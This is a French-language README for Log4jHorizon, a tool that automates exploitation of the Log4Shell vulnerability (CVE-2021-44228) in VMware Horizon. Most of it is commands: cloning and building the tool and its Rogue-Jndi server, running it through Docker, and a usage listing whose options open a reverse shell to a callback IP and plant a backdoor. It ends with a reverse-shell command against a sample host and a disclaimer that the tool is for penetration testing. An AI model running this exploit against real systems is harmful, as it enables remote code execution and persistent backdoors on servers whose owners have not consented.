
Exploitation de CVE-2021-44228 dans VMWare Horizon pour l'exécution de code à distance et plus encore.
Exploitation de CVE-2021-44228 dans VMWare Horizon pour l'exécution de code à distance et plus encore.
Le code et le README.md sont un peu dispersés cette fois-ci. Des mises à jour arrivent !
Les preuves de concept pour cette vulnérabilité sont dispersées et doivent être réalisées manuellement. Ce dépôt automatise le processus d'exploitation. Consultez l'article de blog ci-dessus pour des conseils sur la post-exploitation.
Ce dépôt peut être utilisé manuellement ou avec Docker.
Pour télécharger et exécuter l'exploit manuellement, suivez les étapes suivantes. Tout d'abord, assurez-vous que Java et Maven sont installés sur votre machine d'attaque. Pour ce faire avec apt sur les systèmes d'exploitation basés sur Debian, exécutez la commande suivante :
apt update && apt install openjdk-11-jre maven
Clonez le dépôt GitHub et installez toutes les exigences Python :
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jHorizon \
&& cd Log4jHorizon && pip3 install -r requirements.txt
Depuis la racine du dépôt Log4jHorizon, compilez le projet Rogue-Jndi avec la commande ci-dessous :
mvn package -f utils/rogue-jndi/
Tout d'abord, assurez-vous que Docker est installé sur votre machine d'attaque. (Je ne vais pas vous guider pas à pas pour cela)
Ensuite, exécutez la commande suivante pour cloner le dépôt et construire l'image Docker que nous allons utiliser.
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jHorizon \
&& cd Log4jHorizon && docker build -t Log4jHorizon .
Pour exécuter le conteneur, lancez une commande similaire à la suivante avec vos options de ligne de commande ajoutées. Notez que le conteneur ne capturera pas de reverse shell. Vous devez créer un écouteur ncat dans une session shell séparée :
docker run -it -p 1389:1389 Log4jHorizon \
-r -t horizon.acme.com -i 192.168.1.1 -p 4444
usage: exploit.py [-h] -t URL -i CALLBACK [-p PORT] [-r] [-b]
optional arguments:
-h, --help show this help message and exit
-t URL, --target URL VMWare Horizon IP
-i CALLBACK, --ip CALLBACK
Callback IP for payload delivery and reverse shell.
-p PORT, --port PORT Callback port for reverse shell.
-r, --revshell Module to establish reverse shell using node.exe.
-b, --backdoor Module to add backdoor.
Obtenez un reverse shell en utilisant l'outil installé sur votre système local :
python3 exploit.py -r -t horizon.acme.com -p 442 -i 192.168.1.1
Cet outil est conçu pour être utilisé lors de tests d'intrusion ; l'utilisation de cet outil pour attaquer des cibles sans consentement mutuel préalable est illégale. Il incombe à l'utilisateur final de respecter toutes les lois locales, étatiques et fédérales applicables. Les développeurs déclinent toute responsabilité et ne sont pas responsables de tout usage abusif de ce programme.